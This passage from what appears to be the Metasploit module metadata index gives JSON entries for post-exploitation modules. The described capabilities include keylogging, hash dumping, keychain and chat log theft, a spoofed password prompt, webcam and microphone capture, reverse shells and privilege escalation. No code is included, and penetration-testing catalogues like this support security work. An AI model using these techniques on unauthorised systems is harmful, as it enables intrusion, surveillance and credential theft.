"path": "/modules/post/multi/manage/record_mic.rb",
"is_install_path": true,
"ref_name": "multi/manage/record_mic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/screensaver": {
"name": "Multi Manage the screensaver of the target computer",
"full_name": "post/multi/manage/screensaver",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Eliott Teissonniere"
],
"description": "This module allows you to turn on or off the screensaver of the target computer and also\n lock the current session.",
"references": [
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-21 16:46:00 +0000",
"path": "/modules/post/multi/manage/screensaver.rb",
"is_install_path": true,
"ref_name": "multi/manage/screensaver",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/set_wallpaper": {
"name": "Multi Manage Set Wallpaper",
"full_name": "post/multi/manage/set_wallpaper",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"timwr"
],
"description": "This module will set the desktop wallpaper background on the specified session.\n The method of setting the wallpaper depends on the platform type.",
"references": [
],
"platform": "Android,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/manage/set_wallpaper.rb",
"is_install_path": true,
"ref_name": "multi/manage/set_wallpaper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/shell_to_meterpreter": {
"name": "Shell to Meterpreter Upgrade",
"full_name": "post/multi/manage/shell_to_meterpreter",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Tom Sellers <tom@fadedcode.net>"
],
"description": "This module attempts to upgrade a command shell to meterpreter. The shell\n platform is automatically detected and the best version of meterpreter for\n the target is selected. Currently meterpreter/reverse_tcp is used on Windows\n and Linux, with 'python/meterpreter/reverse_tcp' used on all others.",
"references": [
],
"platform": "BSD,Linux,OSX,Solaris,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-25 15:00:39 +0000",
"path": "/modules/post/multi/manage/shell_to_meterpreter.rb",
"is_install_path": true,
"ref_name": "multi/manage/shell_to_meterpreter",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/sudo": {
"name": "Multiple Linux / Unix Post Sudo Upgrade Shell",
"full_name": "post/multi/manage/sudo",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"todb <todb@metasploit.com>",
"Ryan Baxendale <rbaxendale@gmail.com>"
],
"description": "This module attempts to upgrade a shell account to UID 0 by reusing the\n given password and passing it to sudo. This technique relies on sudo\n versions from 2008 and later which support -A.",
"references": [
"URL-http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h"
],
"platform": "AIX,Linux,OSX,Solaris,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/manage/sudo.rb",
"is_install_path": true,
"ref_name": "multi/manage/sudo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/system_session": {
"name": "Multi Manage System Remote TCP Shell Session",
"full_name": "post/multi/manage/system_session",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will create a Reverse TCP Shell on the target system\n using the system's own scripting environments installed on the\n target.",
"references": [
],
"platform": "Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-22 13:38:06 +0000",
"path": "/modules/post/multi/manage/system_session.rb",
"is_install_path": true,
"ref_name": "multi/manage/system_session",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/upload_exec": {
"name": "Upload and Execute",
"full_name": "post/multi/manage/upload_exec",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Push a file and execute it.",
"references": [
],
"platform": "BSD,Linux,OSX,Solaris,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-02 21:33:01 +0000",
"path": "/modules/post/multi/manage/upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/manage/upload_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/zip": {
"name": "Multi Manage File Compressor",
"full_name": "post/multi/manage/zip",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module zips a file or a directory. On Linux, it uses the zip command.\n On Windows, it will try to use remote target's 7Zip if found. If not, it falls\n back to its Windows Scripting Host.",
"references": [
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/manage/zip.rb",
"is_install_path": true,
"ref_name": "multi/manage/zip",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/recon/local_exploit_suggester": {
"name": "Multi Recon Local Exploit Suggester",
"full_name": "post/multi/recon/local_exploit_suggester",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>",
"Mo"
],
"description": "This module suggests local meterpreter exploits that can be used.\n\n The exploits are suggested based on the architecture and platform\n that the user has a shell opened as well as the available exploits\n in meterpreter.\n\n It's important to note that not all local exploits will be fired.\n Exploits are chosen based on these conditions: session type,\n platform, architecture, and required default options.",
"references": [
],
"platform": "AIX,Android,Apple_iOS,BSD,BSDi,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unifi,Unix,Unknown,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-05 04:41:58 +0000",
"path": "/modules/post/multi/recon/local_exploit_suggester.rb",
"is_install_path": true,
"ref_name": "multi/recon/local_exploit_suggester",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/recon/multiport_egress_traffic": {
"name": "Generate TCP/UDP Outbound Traffic On Multiple Ports",
"full_name": "post/multi/recon/multiport_egress_traffic",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module generates TCP or UDP traffic across a\n sequence of ports, and is useful for finding firewall\n holes and egress filtering. It only generates traffic\n on the port range you specify. It is up to you to\n run a responder or packet capture tool on a remote\n endpoint to determine which ports are open.",
"references": [
],
"platform": "BSD,Linux,OSX,Solaris,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/recon/multiport_egress_traffic.rb",
"is_install_path": true,
"ref_name": "multi/recon/multiport_egress_traffic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/recon/sudo_commands": {
"name": "Sudo Commands",
"full_name": "post/multi/recon/sudo_commands",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module examines the sudoers configuration for the session user\n and lists the commands executable via sudo.\n\n This module also inspects each command and reports potential avenues\n for privileged code execution due to poor file system permissions or\n permitting execution of executables known to be useful for privesc,\n such as utilities designed for file read/write, user modification,\n or execution of arbitrary operating system commands.\n\n Note, you may need to provide the password for the session user.",
"references": [
],
"platform": "BSD,Linux,OSX,Solaris,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/post/multi/recon/sudo_commands.rb",
"is_install_path": true,
"ref_name": "multi/recon/sudo_commands",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/admin/say": {
"name": "OS X Text to Speech Utility",
"full_name": "post/osx/admin/say",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will speak whatever is in the 'TEXT' option on the victim machine.",
"references": [
"URL-http://www.gabrielserafini.com/blog/2008/08/19/mac-os-x-voices-for-using-with-the-say-command/"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/admin/say.rb",
"is_install_path": true,
"ref_name": "osx/admin/say",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/capture/keylog_recorder": {
"name": "OSX Capture Userspace Keylogger",
"full_name": "post/osx/capture/keylog_recorder",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Logs all keyboard events except cmd-keys and GUI password input.\n\n Keylogs are transferred between client/server in chunks\n every SYNCWAIT seconds for reliability.\n\n Works by calling the Carbon GetKeys() hook using the DL lib\n in OSX's system Ruby. The Ruby code is executed in a shell\n command using -e, so the payload never hits the disk.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-15 21:01:05 +0000",
"path": "/modules/post/osx/capture/keylog_recorder.rb",
"is_install_path": true,
"ref_name": "osx/capture/keylog_recorder",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/capture/screen": {
"name": "OSX Screen Capture",
"full_name": "post/osx/capture/screen",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Peter Toth <globetother@gmail.com>"
],
"description": "This module takes screenshots of target desktop and automatically downloads them.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/capture/screen.rb",
"is_install_path": true,
"ref_name": "osx/capture/screen",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/apfs_encrypted_volume_passwd": {
"name": "Mac OS X APFS Encrypted Volume Password Disclosure",
"full_name": "post/osx/gather/apfs_encrypted_volume_passwd",
"rank": 300,
"disclosure_date": "2018-03-21",
"type": "post",
"author": [
"Sarah Edwards",
"cbrnrd"
],
"description": "This module exploits a flaw in OSX 10.13 through 10.13.3\n that discloses the passwords of encrypted APFS volumes.\n\n In OSX a normal user can use the 'log' command to view the system\n logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS\n volume the password is visible in plaintext within these logs.",
"references": [
"URL-https://thehackernews.com/2018/03/macos-apfs-password.html",
"URL-https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp"
],
"platform": "OSX",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-04-18 14:22:32 +0000",
"path": "/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb",
"is_install_path": true,
"ref_name": "osx/gather/apfs_encrypted_volume_passwd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/autologin_password": {
"name": "OSX Gather Autologin Password as Root",
"full_name": "post/osx/gather/autologin_password",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module will steal the plaintext password of any user on the machine\n with autologin enabled. Root access is required.\n\n When a user has autologin enabled (System Preferences -> Accounts), OSX\n stores their password with an XOR encoding in /private/etc/kcpassword.",
"references": [
"URL-http://www.brock-family.org/gavin/perl/kcpassword.html"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-22 22:25:39 +0000",
"path": "/modules/post/osx/gather/autologin_password.rb",
"is_install_path": true,
"ref_name": "osx/gather/autologin_password",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/enum_adium": {
"name": "OS X Gather Adium Enumeration",
"full_name": "post/osx/gather/enum_adium",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will collect Adium's account plist files and chat logs from the\n victim's machine. There are three different actions you may choose: ACCOUNTS,\n CHATS, and ALL. Note that to use the 'CHATS' action, make sure you set the regex\n 'PATTERN' option in order to look for certain log names (which consists of a\n contact's name, and a timestamp). The current 'PATTERN' option is configured to\n look for any log created on February 2012 as an example. To loot both account\n plists and chat logs, simply set the action to 'ALL'.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/gather/enum_adium.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_adium",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/enum_airport": {
"name": "OS X Gather Airport Wireless Preferences",
"full_name": "post/osx/gather/enum_airport",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will download OS X Airport Wireless preferences from the victim\n machine. The preferences file (which is a plist) contains information such as:\n SSID, Channels, Security Type, Password ID, etc.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/gather/enum_airport.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_airport",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/enum_chicken_vnc_profile": {
"name": "OS X Gather Chicken of the VNC Profile",
"full_name": "post/osx/gather/enum_chicken_vnc_profile",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will download the \"Chicken of the VNC\" client application's\n profile file,\twhich is used to store other VNC servers' information such\n as the IP and password.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/osx/gather/enum_chicken_vnc_profile.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_chicken_vnc_profile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/enum_colloquy": {
"name": "OS X Gather Colloquy Enumeration",
"full_name": "post/osx/gather/enum_colloquy",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will collect Colloquy's info plist file and chat logs from the\n victim's machine. There are three actions you may choose: INFO, CHATS, and\n ALL. Please note that the CHAT action may take a long time depending on the\n victim machine, therefore we suggest to set the regex 'PATTERN' option in order\n to search for certain log names (which consists of the contact's name, and a\n timestamp). The default 'PATTERN' is configured as \"^alien\" as an example\n to search for any chat logs associated with the name \"alien\".",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/gather/enum_colloquy.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_colloquy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/enum_keychain": {
"name": "OS X Gather Keychain Enumeration",
"full_name": "post/osx/gather/enum_keychain",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"ipwnstuff <e@ipwnstuff.com>",
"joev <joev@metasploit.com>"
],
"description": "This module presents a way to quickly go through the current user's keychains and\n collect data such as email accounts, servers, and other services. Please note:\n when using the GETPASS and GETPASS_AUTO_ACCEPT option, the user may see an authentication\n alert flash briefly on their screen that gets dismissed by a programmatically triggered click.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/osx/gather/enum_keychain.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_keychain",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/enum_messages": {
"name": "OS X Gather Messages",
"full_name": "post/osx/gather/enum_messages",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Geckom <geckom@redteamr.com>"
],
"description": "This module will collect the Messages sqlite3 database files and chat logs\n from the victim's machine. There are four actions you may choose: DBFILE,\n READABLE, LATEST, and ALL. DBFILE and READABLE will retrieve all messages, and\n LATEST will retrieve the last X number of messages (useful with 2FA). Module\n was tested with OS X 10.11 (El Capitan).",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/gather/enum_messages.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_messages",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/enum_osx": {
"name": "OS X Gather Mac OS X System Information Enumeration",
"full_name": "post/osx/gather/enum_osx",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module gathers basic system information from Mac OS X Tiger (10.4), through\n Mojave (10.14).",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-15 21:01:05 +0000",
"path": "/modules/post/osx/gather/enum_osx.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_osx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/hashdump": {
"name": "OS X Gather Mac OS X Password Hash Collector",
"full_name": "post/osx/gather/hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"hammackj <jacob.hammack@hammackj.com>",
"joev <joev@metasploit.com>"
],
"description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports\n versions 10.3 to 10.14.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-15 21:01:05 +0000",
"path": "/modules/post/osx/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "osx/gather/hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/password_prompt_spoof": {
"name": "OSX Password Prompt Spoof",
"full_name": "post/osx/gather/password_prompt_spoof",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joff Thyer <jsthyer@gmail.com>",
"joev <joev@metasploit.com>",
"Peter Toth <globetother@gmail.com>"
],
"description": "Presents a password prompt dialog to a logged-in OSX user.",
"references": [
"URL-http://blog.packetheader.net/2011/10/fun-with-applescript.html"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-24 05:06:20 +0000",
"path": "/modules/post/osx/gather/password_prompt_spoof.rb",
"is_install_path": true,
"ref_name": "osx/gather/password_prompt_spoof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/safari_lastsession": {
"name": "OSX Gather Safari LastSession.plist",
"full_name": "post/osx/gather/safari_lastsession",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module downloads the LastSession.plist file from the target machine.\n LastSession.plist is used by Safari to track active websites in the current session,\n and sometimes contains sensitive information such as usernames and passwords.\n\n This module will first download the original LastSession.plist, and then attempt\n to find the credential for Gmail. The Gmail's last session state may contain the\n user's credential if his/her first login attempt failed (likely due to a typo),\n and then the page got refreshed or another login attempt was made. This also means\n the stolen credential might contain typos.",
"references": [
"URL-http://www.securelist.com/en/blog/8168/Loophole_in_Safari"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/osx/gather/safari_lastsession.rb",
"is_install_path": true,
"ref_name": "osx/gather/safari_lastsession",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/vnc_password_osx": {
"name": "OS X Display Apple VNC Password",
"full_name": "post/osx/gather/vnc_password_osx",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Kevin Gonzalvo <interhack@gmail.com>"
],
"description": "This module shows Apple VNC Password from Mac OS X High Sierra.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-02 14:22:09 +0000",
"path": "/modules/post/osx/gather/vnc_password_osx.rb",
"is_install_path": true,
"ref_name": "osx/gather/vnc_password_osx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/manage/mount_share": {
"name": "OSX Network Share Mounter",
"full_name": "post/osx/manage/mount_share",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Peter Toth <globetother@gmail.com>",
"joev <joev@metasploit.com>"
],
"description": "This module lists saved network shares and tries to connect to them using stored\n credentials. This does not require root privileges.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/manage/mount_share.rb",
"is_install_path": true,
"ref_name": "osx/manage/mount_share",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/manage/record_mic": {
"name": "OSX Manage Record Microphone",
"full_name": "post/osx/manage/record_mic",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module will allow the user to detect (with the LIST action) and\n capture (with the RECORD action) audio inputs on a remote OSX machine.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/manage/record_mic.rb",
"is_install_path": true,
"ref_name": "osx/manage/record_mic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/manage/vpn": {
"name": "OSX VPN Manager",
"full_name": "post/osx/manage/vpn",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Peter Toth <globetother@gmail.com>"
],
"description": "This module lists VPN connections and tries to connect to them using stored credentials.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/manage/vpn.rb",
"is_install_path": true,
"ref_name": "osx/manage/vpn",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/manage/webcam": {
"name": "OSX Manage Webcam",
"full_name": "post/osx/manage/webcam",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module will allow the user to detect installed webcams (with\n the LIST action), take a snapshot (with the SNAPSHOT action), or\n record a webcam and mic (with the RECORD action)",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/manage/webcam.rb",
"is_install_path": true,
"ref_name": "osx/manage/webcam",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_solaris/escalate/pfexec": {
"name": "Solaris pfexec Upgrade Shell",
"full_name": "post/solaris/escalate/pfexec",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to upgrade a shell session to UID 0 using pfexec.",
"references": [
"URL-https://docs.oracle.com/cd/E19253-01/816-4557/prbactm-1/index.html",
"URL-http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html",
"URL-http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec"
],
"platform": "Solaris",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-02-01 22:58:21 +0000",
"path": "/modules/post/solaris/escalate/pfexec.rb",
"is_install_path": true,
"ref_name": "solaris/escalate/pfexec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_solaris/escalate/srsexec_readline": {
"name": "Solaris srsexec Arbitrary File Reader",
"full_name": "post/solaris/escalate/srsexec_readline",
"rank": 300,
"disclosure_date": "2007-05-07",
"type": "post",
"author": [
"h00die",
"iDefense"
],
"description": "This module exploits a vulnerability in NetCommander 3.2.3 and 3.2.5.\n When srsexec is executed in debug (-d) verbose (-v) mode,\n the first line of an arbitrary file can be read due to the suid bit set.\n The most widely accepted exploitation vector is reading /etc/shadow,\n which will reveal root's hash for cracking.",
"references": [
"CVE-2007-2617",
"URL-https://download.oracle.com/sunalerts/1000443.1.html",
"URL-https://www.securityfocus.com/archive/1/468235",
"EDB-30021",
"BID-23915"
],
"platform": "Solaris",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-09-20 20:54:41 +0000",
"path": "/modules/post/solaris/escalate/srsexec_readline.rb",
"is_install_path": true,
"ref_name": "solaris/escalate/srsexec_readline",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_solaris/gather/checkvm": {
"name": "Solaris Gather Virtual Environment Detection",
"full_name": "post/solaris/gather/checkvm",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. This\n module supports detection of Solaris Zone, VMWare, VirtualBox, Xen,\n and QEMU/KVM.",
"references": [
],
"platform": "Solaris",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/solaris/gather/checkvm.rb",
"is_install_path": true,
"ref_name": "solaris/gather/checkvm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_solaris/gather/enum_packages": {
"name": "Solaris Gather Installed Packages",
"full_name": "post/solaris/gather/enum_packages",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Post Module to enumerate installed packages on a Solaris System",
"references": [
],
"platform": "Solaris",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/solaris/gather/enum_packages.rb",
"is_install_path": true,
"ref_name": "solaris/gather/enum_packages",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_solaris/gather/enum_services": {
"name": "Solaris Gather Configured Services",
"full_name": "post/solaris/gather/enum_services",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Post Module to enumerate services on a Solaris System",
"references": [
],
"platform": "Solaris",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/solaris/gather/enum_services.rb",
"is_install_path": true,
"ref_name": "solaris/gather/enum_services",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_solaris/gather/hashdump": {
"name": "Solaris Gather Dump Password Hashes for Solaris Systems",
"full_name": "post/solaris/gather/hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Post Module to dump the password hashes for all users on a Solaris System",
"references": [
],
"platform": "Solaris",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-03-24 08:11:24 +0000",
"path": "/modules/post/solaris/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "solaris/gather/hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/capture/keylog_recorder": {
"name": "Windows Capture Keystroke Recorder",
"full_name": "post/windows/capture/keylog_recorder",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"Josh Hale <jhale85446@gmail.com>"
],
"description": "This module can be used to capture keystrokes. To capture keystrokes when the session is running\n as SYSTEM, the MIGRATE option must be enabled and the CAPTURE_TYPE option should be set to one of\n Explorer, Winlogon, or a specific PID. To capture the keystrokes of the interactive user, the\n Explorer option should be used with MIGRATE enabled. Keep in mind that this will demote this session\n to the user's privileges, so it makes sense to create a separate session for this task. The Winlogon\n option will capture the username and password entered into the logon and unlock dialog. The LOCKSCREEN\n option can be combined with the Winlogon CAPTURE_TYPE to for the user to enter their clear-text\n password. It is recommended to run this module as a job, otherwise it will tie up your framework user interface.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
